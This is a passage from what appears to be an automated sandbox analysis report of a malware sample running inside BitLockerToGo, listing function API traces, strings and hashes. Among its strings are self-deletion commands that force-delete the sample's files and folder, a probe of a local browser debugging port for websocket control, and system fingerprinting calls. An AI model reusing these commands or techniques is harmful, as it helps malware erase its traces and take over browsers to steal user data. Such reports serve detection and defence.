                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d300422a9f58e3ef1455379df4ee79cad398c2f5f5e86ac84d0652776448846f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95eba54d0d649623e5af4a2e23be9a79aaa9edb7083f87b30908bd39f564f328
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d300422a9f58e3ef1455379df4ee79cad398c2f5f5e86ac84d0652776448846f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A761E775D4012C9AEF21DF64ED84FDAB7B9AB44310F1046E6AA09A2111DF70AFD9CF50
                                                                                                                                                                                                                                                                                                                                                          Function 02A19A4C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19A71
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19A80
                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A19A95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 02A19C35
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19C44
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19C56
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A19C66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • " & rd /s /q "C:\ProgramData\, xrefs: 02A19B0E
                                                                                                                                                                                                                                                                                                                                                          • " & exit, xrefs: 02A19B64
                                                                                                                                                                                                                                                                                                                                                          • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 02A19B6B
                                                                                                                                                                                                                                                                                                                                                          • /c timeout /t 10 & del /f /q ", xrefs: 02A19AC0
                                                                                                                                                                                                                                                                                                                                                          • " & exit, xrefs: 02A19BB5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e98f7a4c144794e798b6ee6519899783532c2991e3bf2c7f915af4a355aa8c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ac759800ddb08258442ee3e9f5513034ab6283855e1ead3bd2166cf59a9e218
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e98f7a4c144794e798b6ee6519899783532c2991e3bf2c7f915af4a355aa8c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451B7B1D8022A9BDB25EF65DD81BDDB3BDAB04714F4104E5AB08B3151CB70AF868F54
                                                                                                                                                                                                                                                                                                                                                          Function 02A07E0E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122networkCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 02A07E3C
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 02A07E6F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A07E7C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                                                                                                                          • String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3289985339-1054772028
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: df54e47376f2729f375a062e4cd6222972c5fabcb06ad455c7420f15b273bc3d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d2ee7e79deecfee37700aab65b3799bdb5c99fa225569bf1cf72390174227110
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df54e47376f2729f375a062e4cd6222972c5fabcb06ad455c7420f15b273bc3d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E413475D40268AFEB219B609DC9EEAB3BCAB09754F040195FA45E3140CFB4AEC4CF61
                                                                                                                                                                                                                                                                                                                                                          Function 02A125FE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12703
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A37DD8), ref: 02A12712
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A12729
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: malloc.MSVCRT ref: 02A14220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: strncpy.MSVCRT ref: 02A14231
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02A1274C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: :\$C$QuBi
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3915896539-239756005
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 25202b5652a25c476e27ef6bce1b51465d32526cfdc227d2f20fe2ddc696b3e4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eed67f253abd9693b2b6da703ef43cb35df27978f9c9d9db4a3feefb2f2db8c1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25202b5652a25c476e27ef6bce1b51465d32526cfdc227d2f20fe2ddc696b3e4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D418E71D802289BDB259F749D85BDEBBB9EF09350F0005E5FA49E2110DA308F958FA5
                                                                                                                                                                                                                                                                                                                                                          Function 02A18F92 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 592networksleepCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,02A19D6E), ref: 02A19007
                                                                                                                                                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A19013
                                                                                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,02A19D6E), ref: 02A19024
                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,02A37803), ref: 02A19249
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A19307
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A1931A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A04A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04AF5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A04A56: StrCmpCA.SHLWAPI(?), ref: 02A04B13
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A156FF: StrCmpCA.SHLWAPI(?,block,?,?,02A19377), ref: 02A15714
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A156FF: ExitProcess.KERNEL32 ref: 02A1571F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05F00
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: StrCmpCA.SHLWAPI(?), ref: 02A05F1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14DE6: strtok_s.MSVCRT ref: 02A14E05
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14DE6: strtok_s.MSVCRT ref: 02A14E88
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02A196C8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A060B6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A060FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0612C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14387: SHFileOperation.SHELL32(?), ref: 02A143BD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 02A18DB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: wsprintfA.USER32 ref: 02A18DD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: FindFirstFileA.KERNEL32(?,?), ref: 02A18DEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _mbscmp.MSVCRT ref: 02A18E13
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _mbscmp.MSVCRT ref: 02A18E2B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _splitpath.MSVCRT ref: 02A18E66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _ismbcupper.MSVCRT ref: 02A18EB3
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A197C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19A71
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19A80
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A19A95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: ShellExecuteEx.SHELL32(?), ref: 02A19C35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19C44
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19C56
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocateCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: 27536a38d3707b6600f28b9d7177a12c$abc_
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1996436140-3117666539
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: daad1816ccfa201c9e1244dc010af0ba3ca85c56720cb2abd262ea524ff123b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d16a464c8efdc73f43910a4be9e416d4e64d7bddc51a4be2d162eebcb36e94ea
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daad1816ccfa201c9e1244dc010af0ba3ca85c56720cb2abd262ea524ff123b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55327E729843419BD720FB65DA86B8EF7E6BFC0360F51091AE98857250DF709A09CF93
                                                                                                                                                                                                                                                                                                                                                          Function 02A18615 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18669
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18674
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 02A18689
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18698
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A186B1
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
